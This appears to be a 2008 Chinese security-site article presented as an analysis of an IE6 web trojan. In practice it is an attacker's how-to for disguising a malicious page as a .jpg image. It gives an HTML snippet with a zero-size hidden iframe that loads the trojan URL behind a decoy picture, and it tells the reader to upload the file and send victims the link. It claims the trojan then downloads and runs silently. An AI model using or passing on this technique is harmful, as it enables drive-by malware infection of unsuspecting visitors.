科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道国内流行的IE6.0最新网页木马分析

国内流行的IE6.0最新网页木马分析

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

针对任何没有打过补丁的IE版本都有效! 。。。。

作者:论坛整理 来源:zdnet网络安全 2008年4月14日

关键字: Web安全 网页木马 ie

  • 评论
  • 分享微博
  • 分享邮件
特点:
1 针对任何没有打过补丁的IE版本都有效! 
2 木马下载过程中防火墙不会做任何反应! 
3 木马地址以jpg为后缀名。列如 http://xxx.xxx.xxx.xxx/003.jpg  
和一般的图片地址无任何俩样!打开地址后在浏览器上会和正常情况下一样出现图片!但木马却已经在后台下载并在下载完成后自动执行!具有很强的迷惑性! 

一般来说,我们做出来的网页木马地址都是以 htm 或html 结尾!那么我们怎么修改呢?很简单! 
不知道大家知道不知道。IE有一个很小的BUG。即只要网站文件里有html码它就会执行,并不理会文件后缀名是什么。 
于是我们可以这么来修改网页木马的后缀名,其实说准确一点并不是修改点网页木马的地址后缀名,是利用一个图片地址来打开这个网页木马! 
打开记事本写入如下一段代码: 

<html> 
<iframe src="IE6。0网页木马地址" width="0" height="0" frameborder="0"></iframe> 
<center><img src="图片地址"></center> 
</html> 
然后将其另存为XXX.jpg 。 
剩下的工作就是将这个XXX.jpg图片格式的文件上传的你的空间,给出相对路径让别人访问了! 
别人在访问这个XXX.jpg文件时。。浏览器会将文件内的html码执行,根据代码的内容。你的网页木马地址会作为隐藏窗口被打开。。另外那个图片也会出现在对方所打开的网页上
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章